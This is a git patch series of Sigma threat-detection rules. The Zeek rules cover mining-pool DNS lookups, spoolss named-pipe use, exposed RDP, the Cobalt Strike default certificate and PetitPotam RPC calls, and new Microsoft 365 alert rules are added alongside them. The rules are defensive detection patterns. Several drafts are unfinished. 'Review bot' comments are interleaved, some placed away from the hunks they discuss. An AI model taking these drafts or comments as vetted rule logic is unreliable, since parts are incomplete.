a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index 0530dbcf..f841b3dd 100644 --- a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml 
@@ -1,4 +1,4 @@ -title: Microsoft 365 - Log on from a risky IP address +title: Microsoft 365 Log on from a risky IP address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: experimental description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.initial_access - - attack.t1078 \ No newline at end of file + - attack.t1078 From b00e1772b3acd7c45ab24eed490381a4d2009dde Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:03:38 -0400 Subject: [PATCH 0520/1367] added logic and usage rule logic should be endswith. match zeek fields for `fields` section add false positive information --- rules/network/zeek/zeek_dns_mining_pools.yml | 27 +++++++++++++++----- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index c43795db..8be5222b 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -1,11 +1,11 @@ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 -description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. +description: Identifies clients that may be performing DNS lookups associated with common currency mining pools. references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml date: 2021/08/19 -author: Saw Winn Naung , Azure-Sentinel -level: medium +author: Saw Winn Naung, Azure-Sentinel, @neu5ron +level: low logsource: service: dns product: zeek @@ -15,7 +15,7 @@ tags: - attack.t1496 detection: selection: - query: + query|endswith: - "monerohash.com" - "do-dear.com" - "xmrminerpro.com" 
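Review bot: `query|endswith` against bare domains such as `"monerohash.com"` also matches any unrelated name that merely ends in those characters, because the comparison has no label boundary, so a look-alike or longer registered name produces a false hit. Where the backend supports it, listing each entry with a leading dot (`".monerohash.com"`) next to the bare domain keeps subdomain coverage without that over-match. The domain list continues past this hunk into the next one.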
@@ -82,10 +82,23 @@ detection: - "crypto-pools.org" - "monero.net" - "backup-pool.com" - - "mooo.com" + - "mooo.com" # Dynamic DNS, may want to exclude - "freeyy.me" - "cryptonight.net" - "shscrypto.net" - condition: selection + exclude_answers: + answers: + - "127.0.0.1" + - "0.0.0.0" + exclude_rejected: + rejected: "true" + condition: selection and not (exclude_answers OR exclude_rejected) +falsepositives: | + A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name". fields: - - clientip + - id.orig_h + - id.resp_h + - query + - answers + - qtype_name + - rcode_name From feb7d0e187d2a6276d2b1ecbd0c2f8713d683bb8 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:11:04 -0400 Subject: [PATCH 0521/1367] Update zeek_dns_mining_pools.yml --- rules/network/zeek/zeek_dns_mining_pools.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 8be5222b..91d87824 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml 
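Review bot: The condition `selection and not (exclude_answers OR exclude_rejected)` uses an upper-case `OR`; Sigma condition keywords are conventionally lower-case and, unless the parser happens to be case-insensitive, this will not tokenize, so write `condition: selection and not (exclude_answers or exclude_rejected)`. `rejected: "true"` compares against a string while Zeek logs `rejected` as a boolean; whether that matches depends on the backend and index mapping, so it is worth a check against real data before relying on the exclusion.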
@@ -93,8 +93,8 @@ detection:
   exclude_rejected:
     rejected: "true"
   condition: selection and not (exclude_answers OR exclude_rejected)
-falsepositives: |
-  A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name".
+falsepositives:
+  - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is "host" and ssl/tls is "server_name".
 fields:
   - id.orig_h
   - id.resp_h
From 1819e4b02b6654101f9767880a102c2fbbd492be Mon Sep 17 00:00:00 2001
From: Nate Guagenti
Date: Mon, 23 Aug 2021 14:12:50 -0400
Subject: [PATCH 0522/1367] improve rule - improve rule logic - match zeek fields for fields section - add false positive information - change rule name to match the logic of the original rule.. Rule said "first" seen, however, no logic that matches that (ie: rare, stacking, etc..)
---
 .../zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
index dfa15acb..a8853b8e 100644
--- a/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
+++ b/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
@@ -1,7 +1,7 @@
-title: First Time Seen Remote Named Pipe - Zeek
+title: SMB Spoolss Name Piped Usage
 id: bae2865c-5565-470d-b505-9496c87d0c30
 description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
-author: OTR (Open Threat Research)
+author: OTR (Open Threat Research), @neu5ron
 references:
   - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
   - https://dirkjanm.io/a-different-way-of-abusing-zerologon/
@@ -9,15 +9,15 @@ references:
 tags:
   - attack.lateral_movement
   - attack.t1021.002
-date: 2018/11/28
+date: 2021/08/23
 logsource:
   product: zeek
   service: smb_files
 detection:
   selection:
-    path: \\*\IPC$
+    path|endswith: IPC$
     name: spoolss
   condition: selection
 falsepositives:
-  - 'Domain Controllers acting as printer servers too? :)'
-level: medium
\ No newline at end of file
+  - Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too
+level: medium
From cfc32e595063433349fd9f4a5d56f1f4e34b0d10 Mon Sep 17 00:00:00 2001
From: Nate Guagenti
Date: Mon, 23 Aug 2021 14:16:55 -0400
Subject: [PATCH 0523/1367] correct fields for zeek_rdp_public_listener.yml correct zeek fields for `fields` section. improve false positives information
---
 rules/network/zeek/zeek_rdp_public_listener.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/rules/network/zeek/zeek_rdp_public_listener.yml b/rules/network/zeek/zeek_rdp_public_listener.yml
index f5e9be21..c0b70992 100644
--- a/rules/network/zeek/zeek_rdp_public_listener.yml
+++ b/rules/network/zeek/zeek_rdp_public_listener.yml
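Review bot: The rule's `date` is overwritten (`2018/11/28` → `2021/08/23`), which erases the creation date; Sigma convention is to keep `date` as-is and record this revision as `modified: 2021/08/23`. The new title `SMB Spoolss Name Piped Usage` has a transposition and should read `SMB Spoolss Named Pipe Usage`. Dropping the "first time seen" wording is consistent with the detection, since nothing in `selection` does any stacking or rarity logic.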
@@ -38,8 +38,8 @@ detection: #- x.x.x.x condition: not selection #and not approved_rdp fields: - - src_ip - - dst_ip + - id.orig_h + - id.resp_h falsepositives: - - none + - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. level: high From 064d7b7b9f7a8bfd7cd990ab5bd6370944390b45 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:23:41 -0400 Subject: [PATCH 0524/1367] improve rule logic zeek_default_cobalt_strike_certificate.yml zeek logging for `certificate.serial` is all letters are capitalized --- rules/network/zeek/zeek_default_cobalt_strike_certificate.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index a4e69cc5..97460495 100644 --- a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -2,7 +2,7 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic author: Bhabesh Raj -date: 2021/06/23 +date: 2021/08/26 references: - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 tags: @@ -13,7 +13,7 @@ logsource: service: x509 detection: selection: - certificate.serial: 8bb00ee + certificate.serial: 8BB00EE condition: selection fields: - san.dns From 41786a1b63bf6a8f7b042c354ee552bd050fb84a Mon Sep 17 00:00:00 2001 
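Review bot: In `zeek_default_cobalt_strike_certificate.yml` the `date` is changed to `2021/08/26`, which post-dates this commit (23 Aug 2021) and, as elsewhere in this series, replaces the creation date instead of recording a revision; keep `date: 2021/06/23` and add `modified: 2021/08/23`. Upper-casing `certificate.serial: 8BB00EE` ties the rule to Zeek's hex formatting, so collectors that emit the serial in lower case would silently stop matching; listing both `8BB00EE` and `8bb00ee` keeps the rule portable across backends that compare case-sensitively.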
From: Austin Songer Date: Mon, 23 Aug 2021 18:55:29 +0000 Subject: [PATCH 0525/1367] In-Progress --- ...crosoft365_activity_by_terminated_user.yml | 24 +++++++++++++++++++ ...ft365_activity_from_infrequent_country.yml | 24 +++++++++++++++++++ ...icrosoft365_activity_from_ip_addresses.yml | 24 +++++++++++++++++++ ...rosoft365_from_suspicious_ip_addresses.yml | 24 +++++++++++++++++++ ...crosoft365_suspicious_inbox_forwarding.yml | 24 +++++++++++++++++++ ...ous_oauth_app_file_download_activities.yml | 24 +++++++++++++++++++ 6 files changed, 144 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_activity_by_terminated_user.yml create mode 100644 rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml create mode 100644 rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml create mode 100644 rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml create mode 100644 rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml create mode 100644 rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml new file mode 100644 index 00000000..d79cd373 --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml 
@@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity performed by terminated user +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity performed by terminated user" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.exfiltration + - attack.t1537 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml new file mode 100644 index 00000000..6aa39b32 --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from infrequent country +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from infrequent country" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml new file mode 100644 index 00000000..9b770204 --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml 
@@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from anonymous IP addresses +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from anonymous IP addresses" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml new file mode 100644 index 00000000..208a9de3 --- /dev/null +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from suspicious IP addresses +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from suspicious IP addresses" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml new file mode 100644 index 00000000..7ae798f7 --- /dev/null +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml 
@@ -0,0 +1,24 @@ +title: Microsoft 365 - +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/22 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Suspicious inbox forwarding" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml new file mode 100644 index 00000000..3c748083 --- /dev/null +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -0,0 +1,24 @@ +title: Microsoft 365 - +id: +status: experimental +description: Detects when a Microsoft Cloud App Security reported +author: Austin Songer @austinsonger +date: 2021/08/22 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Suspicious OAuth app file download activities" + status: success + condition: selection +falsepositives: + - +level: medium +tags: + - attack.initial_access + - \ No newline at end of file From 8e4b8f45dd75a6911aec3ca5487982ae560da388 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Mon, 23 Aug 2021 18:57:17 +0000 Subject: [PATCH 0526/1367] Update --- rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml | 2 +- ...crosoft365_suspicious_oauth_app_file_download_activities.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 7ae798f7..7f328a98 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - +title: Microsoft 365 - Suspicious inbox forwarding id: status: experimental description: Detects when a Microsoft Cloud App Security reported diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 3c748083..d743264e 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - +title: Microsoft 365 - Suspicious OAuth app file download activities id: status: experimental description: Detects when a Microsoft Cloud App Security reported From b255586117bba130ef69e84f465d269c030d5d71 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 23 Aug 2021 14:59:06 -0400 Subject: [PATCH 0527/1367] condition fix and add fields should be `operation` not `endpoint` for the detection logic. added various fields useful for investigation --- ...zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index c50ceb51..52cae554 100644 
--- a/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
+++ b/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
@@ -20,10 +20,18 @@ logsource:
   service: dce_rpc
 detection:
   efs_operation:
-    endpoint|startswith:
+    operation|startswith:
       - 'Efs'
       - 'efs'
   condition: efs_operation
 falsepositives:
   - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).
 level: medium
+fields:
+  - id.orig_h
+  - id.resp_h
+  - id.resp_p
+  - operation
+  - endpoint
+  - named_pipe
+  - uid
From 4ab9519546102984137cdc8252a5275f5e6c22b4 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Mon, 23 Aug 2021 18:59:07 +0000
Subject: [PATCH 0528/1367] Update
---
 rules/cloud/m365/microsoft365_activity_by_terminated_user.yml | 2 +-
 .../m365/microsoft365_activity_from_infrequent_country.yml | 2 +-
 rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml | 2 +-
 rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml | 2 +-
 rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml | 2 +-
 ...crosoft365_suspicious_oauth_app_file_download_activities.yml | 2 +-
 6 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml
index d79cd373..4b60b111 100644
--- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml
+++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml
@@ -1,5 +1,5 @@
 title: Microsoft 365 - Activity performed by terminated user
-id:
+id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee
 status: experimental
 description: Detects when a Microsoft Cloud App Security reported
 author: Austin Songer @austinsonger
diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml
index 6aa39b32..6e161f7d 100644
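Review bot: `operation|startswith` listing both `'Efs'` and `'efs'` relies on the backend comparing case-sensitively; on backends that already match case-insensitively the second entry is redundant, and on case-sensitive ones mixed-case forms are still missed, so the intent deserves a comment such as `# both spellings: Zeek logs the operation name as-is`. Since `endpoint` is now only an investigation field, adding it to the selection — constrained to the interface that carries the EFS operations, if the dce_rpc log populates it reliably — would make the rule more specific than an operation-name prefix alone. The commit's remaining hunks only fill in rule ids and need no change.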
--- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity from infrequent country -id: +id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml index 9b770204..ac34cd56 100644 --- a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity from anonymous IP addresses -id: +id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 208a9de3..36f5e305 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Activity from suspicious IP addresses -id: +id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 7f328a98..5f349d2d 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml 
@@ -1,5 +1,5 @@ title: Microsoft 365 - Suspicious inbox forwarding -id: +id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index d743264e..d795148d 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,5 +1,5 @@ title: Microsoft 365 - Suspicious OAuth app file download activities -id: +id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental description: Detects when a Microsoft Cloud App Security reported author: Austin Songer @austinsonger From 1fa32fcd1a764127bab1c5e4fb8410c19b9d663f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:02:47 +0000 Subject: [PATCH 0529/1367] Update --- .../microsoft365_suspicious_inbox_forwarding.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 5f349d2d..e583f123 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml 
@@ -1,14 +1,14 @@ title: Microsoft 365 - Suspicious inbox forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. author: Austin Songer @austinsonger date: 2021/08/22 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: @@ -17,8 +17,8 @@ detection: status: success condition: selection falsepositives: - - -level: medium + - Unknown +level: low tags: - - attack.initial_access - - \ No newline at end of file + - attack.exfiltration + - attack.t1020 \ No newline at end of file From 595bd3b80f34a2d997f013be2a4bf890818c7956 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:07:09 +0000 Subject: [PATCH 0530/1367] Updated --- .../m365/microsoft365_activity_by_terminated_user.yml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 4b60b111..037dcd00 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml 
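Review bot: `level` is lowered to `low` here while the closely related `microsoft365_suspicious_inbox_manipulation_rules.yml` earlier in this series stays at `medium`; both fire on a Cloud App Security alert about mail-forwarding rules, so the two levels should agree or the difference be explained in `description`. The technique choice for `attack.t1020` is raised on the inbox-manipulation rule earlier in this series and applies here as well.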
@@ -1,7 +1,7 @@
 title: Microsoft 365 - Activity performed by terminated user
 id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee
 status: experimental
-description: Detects when a Microsoft Cloud App Security reported
+description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
 author: Austin Songer @austinsonger
 date: 2021/08/23
 references:
@@ -17,8 +17,7 @@ detection:
     status: success
   condition: selection
 falsepositives:
-  -
+  - Unknown
 level: medium
 tags:
-  - attack.exfiltration
-  - attack.t1537
\ No newline at end of file
+  - attack.impact
\ No newline at end of file
From da69b2f531332e072be94a75e8ca525db9bc82b4 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Mon, 23 Aug 2021 22:09:27 +0000
Subject: [PATCH 0531/1367] Update
---
 ..._suspicious_oauth_app_file_download_activities.yml | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)
diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml
index d795148d..91cbe32c 100644
--- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml
+++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml
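Review bot: `tags` now carries only the tactic `attack.impact` with no technique, and activity on an account that should have been disabled is not really an impact technique; `attack.t1078` (Valid Accounts) under `attack.persistence` or `attack.defense_evasion` is the usual mapping for this alert. In the description, `users whose account were terminated` should be `users whose accounts were terminated`, and `Detects when a Microsoft Cloud App Security reported for users ...` reads better as `Detects when Microsoft Cloud App Security reports activity by users ...`.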
@@ -1,14 +1,14 @@ title: Microsoft 365 - Suspicious OAuth app file download activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. author: Austin Songer @austinsonger -date: 2021/08/22 +date: 2021/08/23 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: @@ -17,8 +17,7 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.initial_access - - \ No newline at end of file + - attack.exfiltration \ No newline at end of file From 754158bfd24c2c0dd965a8ebadcb132df33e9e9d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:18:12 +0000 Subject: [PATCH 0532/1367] Update --- ...5_activity_from_anonymous_ip_addresses.yml | 24 +++++++++++++++++++ ...ft365_activity_from_infrequent_country.yml | 10 ++++---- ...rosoft365_from_suspicious_ip_addresses.yml | 10 ++++---- ...ous_oauth_app_file_download_activities.yml | 3 ++- 4 files changed, 36 insertions(+), 11 deletions(-) create mode 100644 rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml new file mode 100644 index 00000000..697d6f8d --- /dev/null +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml 
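Review bot: The second hunk leaves `tags:` with the bare tactic `attack.exfiltration` and no technique; the description (an OAuth app pulling many files from SharePoint/OneDrive in a way unusual for the user) matches `- attack.t1530` (Data from Cloud Storage) under `- attack.collection`, and `- attack.t1567` is worth adding only if the rule is meant to imply the app forwards the data elsewhere. Separately, the first hunk moves `date:` from 2021/08/22 to 2021/08/23 on a rule that already existed; Sigma uses `date` for the creation date and `modified:` for later edits, so I would revert that line and add `modified: 2021/08/23` if the change needs recording at all.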
@@ -0,0 +1,24 @@ +title: Microsoft 365 - Activity from anonymous IP addresses +id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 +status: experimental +description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity from anonymous IP addresses" + status: success + condition: selection +falsepositives: + - User using a VPN or Proxy +level: medium +tags: + - attack.command_and_control + - attack.t1573 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 6e161f7d..8e155919 100644 --- 